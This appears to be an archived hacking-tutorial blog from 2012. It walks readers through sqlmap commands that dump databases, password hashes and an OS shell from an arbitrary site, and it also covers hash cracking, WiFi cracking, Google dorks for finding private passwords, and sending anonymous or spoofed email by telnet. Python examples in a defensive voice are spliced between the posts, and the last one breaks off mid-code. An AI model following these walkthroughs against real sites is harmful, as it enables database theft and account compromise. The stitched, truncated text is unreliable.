Wednesday, December 5, 2012

Dnsenum - Server information

Dnsenum is a Perl script that can give us some information about a server.
The program currently performs the following operations:
1) Get the host's address (A record).
2) Get the nameservers (threaded).
3) Get the MX records (threaded).
4) Perform AXFR (zone transfer) queries on the nameservers and get BIND versions (threaded).
5) Get extra names and subdomains via Google scraping (Google query = "allinurl: -www site:domain").
6) Brute force subdomains from a file; can also recurse into discovered subdomains that have NS records (all threaded).
7) Calculate C class network ranges for the domain and perform whois queries on them (threaded).
8) Perform reverse lookups on the netranges (C class and/or whois netranges) (threaded).
9) Write the IP blocks to the file domain_ips.txt.
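As an added illustration of step 7 (this is not dnsenum's own code), the following Python groups the addresses that the earlier steps resolved into their /24 ("C class") networks, which are the ranges the whois and reverse-lookup steps then work on. The hostnames and addresses are constructed sample data; the RFC 1918 filter mirrors the effect of --private, which hides private addresses unless asked.

```python
import ipaddress
from collections import defaultdict

# Constructed sample records (example data, not dnsenum output):
# hostname -> resolved IPv4 address.
SAMPLE_RECORDS = {
    "www.example.com": "203.0.113.10",
    "mail.example.com": "203.0.113.25",
    "ns1.example.com": "198.51.100.2",
    "ns2.example.com": "198.51.100.3",
    "dev.example.com": "10.0.0.5",  # RFC 1918 address, skipped unless include_private=True
}

# The private ranges that are left out unless the equivalent of --private is given.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(addr):
    """True if the address belongs to one of the RFC 1918 private ranges."""
    return any(addr in net for net in RFC1918)


def c_class_ranges(records, include_private=False):
    """Group resolved addresses into their /24 ("C class") networks.

    Returns {IPv4Network: sorted hostnames} for every /24 that contains at least
    one resolved host: the set of ranges a whois query or a reverse-lookup sweep
    (steps 7 and 8 above) would operate on.
    """
    ranges = defaultdict(list)
    for host, ip in records.items():
        addr = ipaddress.ip_address(ip)
        if is_rfc1918(addr) and not include_private:
            continue
        net = ipaddress.ip_network(f"{addr}/24", strict=False)  # strict=False tolerates host bits
        ranges[net].append(host)
    return {net: sorted(hosts) for net, hosts in ranges.items()}


def ip_blocks(records, include_private=False):
    """The networks in CIDR notation, sorted (a block list like the one step 9 writes;
    the exact file format dnsenum uses may differ)."""
    return sorted(str(net) for net in c_class_ranges(records, include_private))


def hosts_in_block(records, cidr, include_private=False):
    """Hostnames that fall inside the given /24, e.g. '203.0.113.0/24'."""
    return c_class_ranges(records, include_private).get(ipaddress.ip_network(cidr), [])


def reverse_lookup_targets(cidr):
    """Number of usable addresses a reverse-lookup sweep of this block would have to query."""
    return sum(1 for _ in ipaddress.ip_network(cidr).hosts())


if __name__ == "__main__":
    for block in ip_blocks(SAMPLE_RECORDS):
        print(block, hosts_in_block(SAMPLE_RECORDS, block), reverse_lookup_targets(block), "PTR queries")
```

The count returned by reverse_lookup_targets is why step 8 is threaded: every /24 the tool discovers costs 254 PTR queries, which is also a volume a DNS resolver's logs will show clearly.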
You can download the latest version of dnsenum from here.
Now we need Perl and the Net::IP module (Net/IP.pm); we can install it by typing:
cpan -i Net::IP
For more info about dnsenum type: ./dnsenum.pl -h
Syntax: ./dnsenum.pl [options] site
Options:
--dnsserver server : Use this DNS server for A, NS and MX queries.
--noreverse : Skip the reverse lookup operations.
--private : Show and save private IPs at the end of the file domain_ips.txt.
--subfile file : Write all valid subdomains to this file.
-t value : The TCP and UDP timeout values in seconds (default: 10s).
--threads value : The number of threads.
-v : Be verbose: show all the progress and all the error messages.
-p value : Number of Google search pages to process when scraping names (default: 20).
-s value : The maximum number of subdomains that will be scraped from Google.
-f file : Read subdomains from this file to perform brute force.
-u a|g|r|z : Update the file specified with -f:
a : update using all results.
g : update using only Google scraping results.
r : update using only reverse lookup results.
z : update using only zone transfer results.
-r : Recursion on subdomains: brute force all discovered subdomains that have an NS record.
-d value : Maximum number of seconds to wait between whois queries; the actual delay is chosen randomly (default: 3s).
-w : Perform the whois queries on C class network ranges.
-o file : Output in XML format.

Example:
./dnsenum.pl -s 100 --threads 5 -d 5 www.site.com
Max of subdomains = 100
Number of threads = 5
Max value of seconds to wait = 5
Target = www.site.com
./dnsenum.pl -s 100 -p 5 -o /home/HackForLulz/scan/dns www.site.com
Max of subdomains = 100
Max of Google pages = 5
Output file = /home/HackForLulz/scan/dns

If you have any problem or if you need some explanations just write under this post!

Saturday, November 24, 2012

Sqlmap - SQL injection part 2

If you haven't read Sqlmap - SQL injection part 1, click here.
Now we'll see some advanced options for sqlmap.
With -o we turn on all optimization switches.
With --random-agent we use a randomly selected HTTP User-Agent header.
With --ignore-proxy we ignore the system default HTTP proxy (use --ignore-proxy only when sqlmap returns an error about it).
With --level=level we change the level of tests to perform (default level=1, range 1-5).
With --risk=risk we change the risk of the tests to perform (default risk=1, range 0-3).
With --technique=technique we choose the injection techniques to use (default "BEUST").
We can find the current database user with: --current-user
If we add --passwords we can also dump the users' password hashes: --current-user --passwords
With --dump-all we can dump all the databases.
We can open a shell with --os-shell, or if we want to use Metasploit we can use:
--msf-path=/path/of/msf
We can use Tor to proxy sqlmap with: --tor

If you have any problem or if you need some explanations just write under this post!

Proxychains

Proxychains is a program that chains together different proxies and makes any program you want use them.
For example you can use proxychains to run Metasploit through Tor (proxychains msfconsole), or to use a VPN together with Tor.
You can install proxychains with: sudo apt-get install proxychains
If you use Arch you can install it from the AUR.
Now, if you want, you can edit your proxychains.conf, adding to the [ProxyList] section the proxy you want to use, for example: socks5 127.0.0.1 9050 (for Tor)
Now you can use proxychains with any program, for example openvpn, nmap, etc.

If you have any problem or if you need some explanations just write under this post!

Monday, November 19, 2012

Hash Identifier

Do you have a hash to crack (see the last article) but you don't know what kind of hash it is?
You can use a Python script called Hash Identifier to find out what kind of hash it is.
You can download Hash Identifier from here.
Hash formats supported: ADLER-32
CRC-32
CRC-32B
CRC-16
CRC-16-CCITT
DES(Unix)
FCS-16
GHash-32-3
GHash-32-5
GOST R 34.11-94
Haval-160
Haval-192 110080
Haval-224 114080
Haval-256
Lineage II C4
Domain Cached Credentials
XOR-32
MD5(Half)
MD5(Middle)
MySQL
MD5(phpBB3)
MD5(Unix)
MD5(Wordpress)
MD5(APR)
Haval-128
MD2
MD4
MD5
MD5(HMAC(Wordpress))
NTLM
RAdmin v2.x
RipeMD-128
SNEFRU-128
Tiger-128
MySQL5 - SHA-1(SHA-1($pass))
MySQL 160bit - SHA-1(SHA-1($pass))
RipeMD-160
SHA-1
SHA-1(MaNGOS)
Tiger-160
Tiger-192
md5($pass.$salt) - Joomla
SHA-1(Django)
SHA-224
RipeMD-256
SNEFRU-256
md5($pass.$salt) - Joomla
SAM - (LM_hash:NT_hash)
SHA-256(Django)
RipeMD-320
SHA-384
SHA-256
SHA-384(Django)
SHA-512
Whirlpool
And more…

To run this script you need Python; move into its directory (with cd) and type:
./Hash_ID.py
Now enter the hash and wait a moment. Now we know what kind of hash it is!
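To show what a tool like Hash Identifier actually does, here is an added Python example (not the script's own code) that classifies a string the same way: formats with a recognisable structure (a $1$ prefix, a * prefix, an LM:NT pair) are matched exactly, while a plain hex digest can only be narrowed down by its length, which is why MD5, MD4 and NTLM all come back as candidates for a 32-character hex string. The format names are taken from the list above; the patterns and the sample inputs are my own constructions, and the MD5 sample is the digest of "test" quoted later on this page in the Findmyhash post.

```python
import re

B64 = r"[./0-9A-Za-z]"  # the crypt(3) alphabet

# Formats with a recognisable structure. Each entry: (name as listed above, pattern).
STRUCTURED = [
    ("MD5(Unix)", re.compile(r"\$1\$" + B64 + r"{1,8}\$" + B64 + r"{22}")),
    ("MD5(APR)", re.compile(r"\$apr1\$" + B64 + r"{1,8}\$" + B64 + r"{22}")),
    ("MD5(Wordpress)", re.compile(r"\$P\$" + B64 + r"{31}")),
    ("MD5(phpBB3)", re.compile(r"\$H\$" + B64 + r"{31}")),
    ("MySQL5 - SHA-1(SHA-1($pass))", re.compile(r"\*[0-9A-Fa-f]{40}")),
    ("SAM - (LM_hash:NT_hash)", re.compile(r"[0-9A-Fa-f]{32}:[0-9A-Fa-f]{32}")),
    ("SHA-1(Django)", re.compile(r"sha1\$[0-9A-Za-z]*\$[0-9A-Fa-f]{40}")),
    ("SHA-256(Django)", re.compile(r"sha256\$[0-9A-Za-z]*\$[0-9A-Fa-f]{64}")),
    ("md5($pass.$salt) - Joomla", re.compile(r"[0-9A-Fa-f]{32}:[0-9A-Za-z]{16}")),
    ("DES(Unix)", re.compile(B64 + r"{13}")),
]

# Plain hex digests carry no structure, so only the length narrows them down.
HEX_BY_LENGTH = {
    4: ["CRC-16", "CRC-16-CCITT", "FCS-16"],
    8: ["CRC-32", "CRC-32B", "ADLER-32", "XOR-32", "GHash-32-3", "GHash-32-5"],
    16: ["MySQL", "MD5(Half)", "MD5(Middle)"],
    32: ["MD5", "MD4", "MD2", "NTLM", "Domain Cached Credentials",
         "RipeMD-128", "Haval-128", "Tiger-128", "SNEFRU-128"],
    40: ["SHA-1", "RipeMD-160", "Haval-160", "Tiger-160", "SHA-1(MaNGOS)"],
    48: ["Tiger-192", "Haval-192"],
    56: ["SHA-224", "Haval-224"],
    64: ["SHA-256", "RipeMD-256", "SNEFRU-256", "Haval-256", "GOST R 34.11-94"],
    80: ["RipeMD-320"],
    96: ["SHA-384"],
    128: ["SHA-512", "Whirlpool"],
}


def identify(candidate):
    """Return the possible hash types for the string, most likely first, or [] if unrecognised."""
    h = candidate.strip()
    for name, pattern in STRUCTURED:
        if pattern.fullmatch(h):
            return [name]
    if re.fullmatch(r"[0-9A-Fa-f]+", h):
        return list(HEX_BY_LENGTH.get(len(h), []))
    return []


# Constructed sample inputs (only the first is a real digest: MD5 of "test").
SAMPLES = [
    "098f6bcd4621d373cade4e832627b4f6",
    "$1$saltsalt$abcdefghijklmnopqrstuv",
    "*" + "A" * 40,
    "a" * 32 + ":" + "b" * 32,
    "not a hash!",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", identify(sample) or "unknown")
```

The ambiguity is the practical lesson: a bare 32-hex string cannot be told apart from NTLM or MD4 by inspection, so the context it was found in (a Windows SAM dump, a PHP application's users table) is what really decides the type.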

If you have any problem or if you need some explanations just write under this post!

Saturday, November 10, 2012

Sqlmap - SQL injection part 1

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
-Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
-Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
-Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
-Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
-Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
-Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
-Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
-Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
-Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

You can download sqlmap from here.
After downloading, extract sqlmap.
Move into the directory (cd sqlmap).
To run sqlmap we need Python 2.6 or 2.7; you can download Python from the official website.
For more info about sqlmap click here.

START


First we need a URL to analyze, for example www.website.com/pag.php?id=4
Now we can analyze this URL with sqlmap:
./sqlmap.py -u "www.website.com/pag.php?id=4"
If the parameter is injectable (in this case the parameter is id) we can see the list of databases by adding --dbs.
./sqlmap.py -u "www.website.com/pag.php?id=4" --dbs
Then we can see the list of tables contained in one database by adding --tables
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --tables
Then we can see the list of columns contained in one table by adding --columns
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --columns
Now if you're interested in the contents you can dump the table with --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database -T table --dump
./sqlmap.py -u "www.website.com/pag.php?id=4" -D database --dump (this dumps all the tables in the database)
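What makes the id parameter of pag.php?id=4 "injectable" is the way the server builds its query. The following added Python example (my own, not sqlmap's code nor the page's) models that page with an in-memory SQLite table: the vulnerable function pastes the parameter into the SQL text, the hardened one validates it and binds it as a query parameter, and the last function shows the boolean-based blind check listed in the feature list above, which is how sqlmap decides whether a parameter is injectable before any --dbs step. The table contents are constructed sample data.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's database: one table with a row the page should
    show (id 4) and one it should not (hidden = 1)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)")
    conn.executemany(
        "INSERT INTO pages VALUES (?, ?, ?)",
        [(4, "public page", 0), (5, "hidden page", 1)],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, id_param):
    """The injectable pattern: the request parameter is concatenated into the SQL text,
    so whatever follows the number in the parameter becomes part of the query."""
    sql = "SELECT title FROM pages WHERE id = " + id_param + " AND hidden = 0"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, id_param):
    """The fix: check the type, then bind the value as a parameter. The driver sends it
    separately from the SQL text, so it can never change the structure of the query."""
    try:
        page_id = int(id_param)
    except ValueError:
        return []
    sql = "SELECT title FROM pages WHERE id = ? AND hidden = 0"
    return [row[0] for row in conn.execute(sql, (page_id,))]


def responds_to_boolean_probe(conn, lookup, base="4"):
    """Boolean-based blind detection: append a condition that is always true and one that
    is always false; if the two responses differ, the parameter is being interpreted as SQL."""
    true_case = lookup(conn, base + " AND 1=1")
    false_case = lookup(conn, base + " AND 1=2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "4"))            # ['public page']
    print(vulnerable_lookup(db, "4 OR 1=1 --"))  # ['public page', 'hidden page']: the hidden row leaks
    print(safe_lookup(db, "4 OR 1=1 --"))        # []
    print(responds_to_boolean_probe(db, vulnerable_lookup), responds_to_boolean_probe(db, safe_lookup))
```

Against the hardened version the two probes return the same (empty) result, so the detection step fails and none of the later --dbs, --tables or --dump steps have anything to work with; the parameterised query is the fix to apply on the application side.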

If you have any problem or if you need some explanations just write under this post!

Thursday, November 8, 2012

Findmyhash - Crack hashes

Findmyhash is a Python script for cracking hash strings.
You can download this script from here.
Findmyhash supports:
MD4 - RFC 1320
MD5 - RFC 1321
SHA1 - RFC 3174 (FIPS 180-3)
SHA224 - RFC 3874 (FIPS 180-3)
SHA256 - FIPS 180-3
SHA384 - FIPS 180-3
SHA512 - FIPS 180-3
RMD160 - RFC 2857
GOST - RFC 5831
WHIRLPOOL - ISO/IEC 10118-3:2004
LM - Microsoft Windows hash
NTLM - Microsoft Windows hash
MYSQL - MySQL 3, 4, 5 hash
CISCO7 - Cisco IOS type 7 encrypted passwords
JUNIPER - Juniper Networks $9$ encrypted passwords
LDAP_MD5 - MD5 Base64 encoded
LDAP_SHA1 - SHA1 Base64 encoded

OPTIONS
-h hash_value: If you only want to crack one hash, specify its value with this option. (python findmyhash.py MD5 -h "098f6bcd4621d373cade4e832627b4f6")
-f file: If you have several hashes, you can specify a file with one hash per line. (python findmyhash.py MYSQL -f mysqlhashesfile.txt)
-g : If your hash cannot be cracked, search it in Google and show all the results.
FOR MORE INFO VISIT: http://code.google.com/p/findmyhash/
If you want to know what kind of hash yours is, check this article.
If you have any problem or you need some explanations just write under this post !

Thursday, November 1, 2012

Nessus - Server Scan

In computer security, Nessus is a proprietary comprehensive vulnerability scanning program.
It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.
You can download Nessus from the official website, click here.
Now you must obtain an activation code from here.
Now you must register your code:
/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
Now you can start the Nessus daemon:
Move into the directory: /opt/nessus/sbin
sudo ./nessusd
Now we must add a user:
sudo /opt/nessus/sbin/nessus-adduser
Now we can start Nessus! Open the browser and go to: https://localhost:8834

If you have any problem or you need some explanations just write under this post !

Sunday, October 28, 2012

Wifite - Crack WiFi

Wifite is an automated wireless auditor written in Python.
You can download wifite from here.
This script works only on Linux, not on Windows or OS X.
You need Python 2.6 or 2.7 to run this script.
You need wireless drivers patched for monitor mode and injection. Most security distributions (BackTrack, BlackBuntu, etc.) come with wireless drivers pre-patched.
You need the aircrack-ng suite.
To run it, move into its directory (with cd) and type:
python wifite.py
For more information type:
python wifite.py -help
P.S.: to run this script you need root access!

If you have any problem or you need some explanations just write under this post !

Wednesday, October 10, 2012

Whatweb

WhatWeb is a tool for web application analysis written by Andrew Horton in 2009.

Install:


First we install Ruby (Linux):
sudo apt-get install ruby ruby-dev libopenssl-ruby rubygems1.8
Then we install some Ruby dependencies:
sudo gem install anemone em-resolv-replace json bson bson_ext mongo rchardet
Now download WhatWeb from here.

Run


To run WhatWeb move into its directory (with cd) and type ./whatweb
Now you can see the help of WhatWeb. WhatWeb has more than 900 plugins.
WhatWeb has 4 levels of "aggression":

1 passive: makes a single request on the target, except for redirects.
2 empty (unused).
3 aggressive: performs a thorough scan of the target.
4 heavy: greater depth than the third level.
To make a scan type:
./whatweb --aggression=3 www.site.com
For more details see the help of WhatWeb!

If you have any problem or you need some explanations just write under this post !

Tuesday, October 2, 2012

How to crack hashed password using google

Hashing is not the same as encryption. Encryption is bidirectional and hashing is unidirectional.
Encryption : plaintext <----> ciphertext
Hashing : plaintext ----> hash
We can recover hashed passwords using Google with a Python script called Gcrack.
You can download Gcrack from here.
Gcrack allows you to crack more than one password at the same time.
To run Gcrack we need a Python interpreter; I recommend Python 2.7.
Now move into its directory (with cd).
Type: python gcrack.py pass.txt
pass.txt is the path of the file containing the list of hashes to crack.
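Since hashing is one-way, neither Gcrack nor Findmyhash (the earlier post on this page) "decrypts" anything: Google and the online services only match the digest against hashes that were already computed for common words. The added Python example below (mine, not Gcrack's or Findmyhash's code) makes that concrete for both posts with a tiny constructed word list: the MD5 quoted in the Findmyhash post is found by lookup because it is the unsalted digest of "test", while the same password stored with a random salt and PBKDF2 produces a different digest every time and matches nothing in any precomputed table.

```python
import hashlib
import hmac
import os

# Constructed mini word list (example data).
WORDLIST = ["password", "123456", "test", "letmein"]


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def build_lookup_table(words):
    """Precompute digest -> word. A Google search or an online cracking service is in
    effect a very large version of this table: the hash is never reversed, only matched."""
    return {md5_hex(w): w for w in words}


def reverse_unsalted(digest, table):
    """Return the word whose MD5 equals the digest, or None if nobody precomputed it."""
    return table.get(digest.strip().lower())


def salted_hash(password, salt=None, iterations=50_000):
    """Store passwords as salt$PBKDF2-HMAC-SHA256(password, salt) with a random 16-byte salt.
    Every user gets a different digest for the same password, so no precomputed table
    applies, and the iteration count makes each guess deliberately slow."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex() + "$" + dk.hex()


def verify_salted(password, stored, iterations=50_000):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), iterations)
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print(reverse_unsalted("098f6bcd4621d373cade4e832627b4f6", table))  # the Findmyhash example: "test"
    stored = salted_hash("test")
    print(stored, reverse_unsalted(stored, table), verify_salted("test", stored))
```

The practical reading for anyone storing passwords: an unsalted fast hash of a common password is as good as plaintext once it is indexed anywhere, and a per-user salt plus a slow KDF is what takes the lookup approach off the table.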

If you have any problem or you need some explanations just write under this post !

Thursday, September 27, 2012

How to visit .onion website

Today I want to show you how to surf .onion websites, a part of the Deep Web.
I quote what Wikipedia says about the Deep Web:
The Deep Web is World Wide Web content that is not part of the Surface Web, which is indexable by standard search engines like Google.
It should not be confused with the dark Internet, the computers that can no longer be reached via Internet, or with the distributed filesharing network Darknet, which could be classified as a smaller part of the Deep Web.
We can visit .onion websites only using Tor. You can see how to install Tor here.
On .onion websites we can find what is illegal for traditional websites.
In most cases we must know the URL of the website, which is composed of a string of letters and numbers followed by .onion
But there are some search engines; the most popular is Torch!
We can visit Torch by copying this URL: xmh57jrzrnw6insl.onion or click here. Another search engine is Deep Search, but Deep Search returns only the first ten pages.
At the moment Deep Search is offline but maybe it will return! You can visit Deep Search by copying this URL: xycpusearchon2mc.onion or click here.
Another search engine is Onioon. Onioon can be expanded by its users.
You can visit Onioon by copying this URL: dts563ge5y7c2ika.onion or click here.
For other information about .onion websites you can visit the Hidden Wiki by copying this URL: 7jguhsfwruviatqe.onion or click here.

If you have any problem or you need some explanations just write under this post !

Monday, September 17, 2012

Google Dorks

Google is the most popular search engine.
Google dorks allow us to find private documents, password lists, emails, etc. that Google has indexed.
To use a dork we just write, after one of these "codes", what we want to search for:
For example, if we want to search all the pages of www.sito.it we type:
site:www.sito.it
site: restricts results to a domain
intitle: restricts results to pages that contain a specific word in the title
allintitle: restricts results to pages that contain all the given words in the title
With intitle we search for one word in the title of the page, while with allintitle we search for two or more words in the title of the page.
filetype: restricts results to the type of file we are searching for
link: restricts results to pages that link to the given address, e.g. link:hackforlulz.blogspot.it
allintext: restricts results to web pages that contain the given text
define: describes a term and gives related links
related: searches for similar web pages
info: provides information and links about a specific URL
With * we leave a word undefined, e.g.: site:*.aspx
With this we search all the sites with .aspx pages.
For a list of dorks that can be used to search for vulnerabilities click here
I am not saying that with Google dorks you can hack websites, only that if you use Google dorks properly you can find a lot of private documents and so find passwords, emails, etc.

If you have any problem or you need some explanations just write under this post !

Thursday, September 6, 2012

How to send anonymous email

There are a lot of websites that allow you to send anonymous mail. But I want to present you a tool that allows you to send anonymous mail without any browser.

Linux


We use Mixmaster, the most popular program that lets you send anonymous emails through type II remailers and beyond.
To use Mixmaster, if you use a firewall you must unblock port 25 (SMTP).
By default Mixmaster sends email with sendmail. I recommend installing sendmail; otherwise you can edit mix.cfg.
In some distros you can find Mixmaster in the repository, but if you want to install it from source code you can download the archive from here.
Extract the archive, move into its directory and launch the install script.
Answer the questions, but when it asks you - Do you want to set up a remailer? - answer NO.
Now we install the OpenSSL and ncurses libraries. To start Mixmaster move into its directory and type: ./mixmaster
A window will open; then, to send a message, type - m -
Now we write the email address and the subject. Then type e to write the message.
To write the message we must use the text editor Vim. After writing the message press SHIFT+Q and type exit.
To choose a chain of remailers just type the key - c -; there you will see a list of all the available remailers.
Before choosing remailers you should check their status. To check the status of the remailers click here, or type - u - in Mixmaster's window and press - * -; now it will do the update.
To send the email type - m - and then type - s -
It may happen that some mail is lost. If you choose a chain of 3-4 remailers it may happen that the email arrives after 1-2 days.

Windows or Mac OSX


On Windows we can use telnet to send anonymous mail.
First we choose the SMTP server to send the email through; for a list click here.
Now type: open server port, e.g.: open pop.tiscali.it 25
When the connection is established type: helo hostname
After the server answers 250 servername, we start to send the email.
With: mail from: mail@address.com we set the sender
With: rcpt to: mail@address.com we set the recipient
Type data to start writing the message. When you finish, press enter twice, then type a dot (.) and press enter again.
So you have sent the mail; now to exit type: quit

We can use telnet also on Linux, but I prefer Mixmaster!
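To see both sides of the telnet dialogue above, here is an added Python model of the server end (my own example, not part of the post or of any mail server): each line the client types is fed in and the reply code the server would send comes back. It makes two points the post leaves implicit: the address given in "mail from:" is accepted on trust, which is why it can be set to anything (and why receiving servers rely on SPF and DKIM rather than that field), and a correctly configured server only accepts recipients in its own domains, so the session only delivers mail when the server is responsible for the recipient's domain or is misconfigured as an open relay. The hostname mail.example.net and the domain example.net are constructed values.

```python
LOCAL_DOMAINS = {"example.net"}  # constructed: the domains this server accepts mail for


class SmtpSession:
    """Server side of the hand-typed SMTP dialogue. feed() takes one client line and
    returns the server's reply, or None while message text is being collected."""

    def __init__(self, hostname="mail.example.net", local_domains=LOCAL_DOMAINS):
        self.hostname = hostname
        self.local_domains = local_domains
        self.helo = None
        self.sender = None
        self.recipients = []
        self.in_data = False
        self.body = []
        self.messages = []  # (sender, recipients, text) for every accepted message

    def greeting(self):
        return f"220 {self.hostname} ESMTP ready"

    @staticmethod
    def _address(arg):
        """Extract the mailbox from 'FROM: a@b', 'TO:<a@b>' and similar spellings."""
        _, _, rest = arg.partition(":")
        addr = rest.strip().strip("<>")
        return addr if "@" in addr else None

    def feed(self, line):
        if self.in_data:
            if line == ".":  # a lone dot ends the message
                self.in_data = False
                self.messages.append((self.sender, list(self.recipients), "\n".join(self.body)))
                self.sender, self.recipients, self.body = None, [], []
                return "250 OK: queued"
            self.body.append(line[1:] if line.startswith("..") else line)  # undo dot-stuffing
            return None
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            self.helo = arg.strip() or None
            return f"250 {self.hostname}" if self.helo else "501 Syntax: HELO hostname"
        if verb == "MAIL":
            if self.helo is None:
                return "503 Error: send HELO first"
            # The sender is taken on trust: nothing here verifies it.
            self.sender = self._address(arg)
            return "250 OK" if self.sender else "501 Syntax: MAIL FROM:<address>"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Error: need MAIL command"
            addr = self._address(arg)
            if addr is None:
                return "501 Syntax: RCPT TO:<address>"
            if addr.rpartition("@")[2].lower() not in self.local_domains:
                return "554 Relay access denied"  # not an open relay: local mailboxes only
            self.recipients.append(addr)
            return "250 OK"
        if verb == "DATA":
            if not self.recipients:
                return "503 Error: need RCPT command"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 Bye"
        return "502 Command not implemented"


def run_dialogue(lines, session=None):
    """Feed a whole client transcript; return [(client line, server reply)] pairs."""
    session = session or SmtpSession()
    return [(line, session.feed(line)) for line in lines]


if __name__ == "__main__":
    transcript = ["helo hostname", "mail from: mail@address.com", "rcpt to: someone@other.org",
                  "rcpt to: someone@example.net", "data", "Subject: hello", "", "body text", ".", "quit"]
    for client_line, reply in run_dialogue(transcript):
        print(f"C: {client_line!r:32} S: {reply}")
```

Reading a real server's replies the same way is the quickest check that your own mail server is not an open relay: a 554 on the foreign-domain RCPT is what you want to see.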

If you have a problem or you need some explanations just write under this post!

Saturday, September 1, 2012

Let's scan a server

To scan a server we can use a lot of tools, like nmap.
You can find a lot of tools with their descriptions here.
In this article we'll see in detail scanning tools like nmap, nikto, load balancer detector and halberd.

Nmap


Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon, used to discover hosts and services on a computer network, thus creating a "map" of the network.
To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses.
You can download nmap from here; nmap works on Linux, BSD, Solaris, Windows and Mac OS X.

On Linux/BSD/Solaris


In some distros we can find nmap in the official repository, so we can install nmap just by typing in the terminal: sudo apt-get install nmap.
Otherwise we must download the nmap .tar.bz2 archive from here.
After downloading we must extract the archive. Move into the directory (with cd) where the archive was downloaded:
tar -jxvf archive_name.tar.bz2
cd nmap (the directory just extracted)
./configure
make
sudo make install

Windows


On Windows you only need to run the installer exe. You can download the executable from here.

Mac OSX


First we must download the nmap .dmg
Double click on the file just downloaded.
Double click on nmap-.mpkg
Follow the instructions in the installer.
For more details on the installation: Windows, Mac OS X

Now we can use nmap from the command line. Nmap has a GUI called Zenmap, but we'll see how to use nmap from the command line.
Nmap has a lot of options; we can see them all with: nmap --help
-sS --> TCP SYN scan
-sU --> UDP port scan
-F --> Fast scan (limited ports)
-O --> OS detection
-A --> Enable OS detection, version detection, script scanning, and traceroute
-p --> To set the ports
nmap -sS -A -p 25-30 127.0.0.1
TCP SYN scan of ports 25 to 30 with OS detection, version detection, script scanning and traceroute.
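A scan of your own server is only useful if the result is compared with what should be listening. The following added Python example (mine, not nmap's code) parses nmap's XML report, which nmap writes with the -oX option (an option not mentioned in the post), pulls out the open ports per host, and reports every open port that is not on an allow-list. The XML is a constructed sample in the shape of nmap's output, not a real scan, and the address 192.0.2.10 is a documentation address.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of nmap's XML output (-oX); made up for this example.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sS -A -p 22,25,80,3306 -oX scan.xml 192.0.2.10">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="25"><state state="open"/><service name="smtp"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(xml_text):
    """Parse nmap XML and return {address: [(protocol, port, service)]} for open ports only."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.findall("host"):
        address = host.find("address")
        if address is None:
            continue
        found = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            service = port.find("service")
            found.append((port.get("protocol"), int(port.get("portid")),
                          service.get("name") if service is not None else None))
        result[address.get("addr")] = found
    return result


def unexpected_ports(xml_text, expected):
    """Compare each host's open ports with an allow-list {address: {port, ...}} and return
    the open ports that are not on it: what a scan of your own server should make you investigate."""
    findings = {}
    for address, ports in open_ports(xml_text).items():
        allowed = expected.get(address, set())
        extra = [entry for entry in ports if entry[1] not in allowed]
        if extra:
            findings[address] = extra
    return findings


if __name__ == "__main__":
    print(open_ports(SAMPLE_XML))
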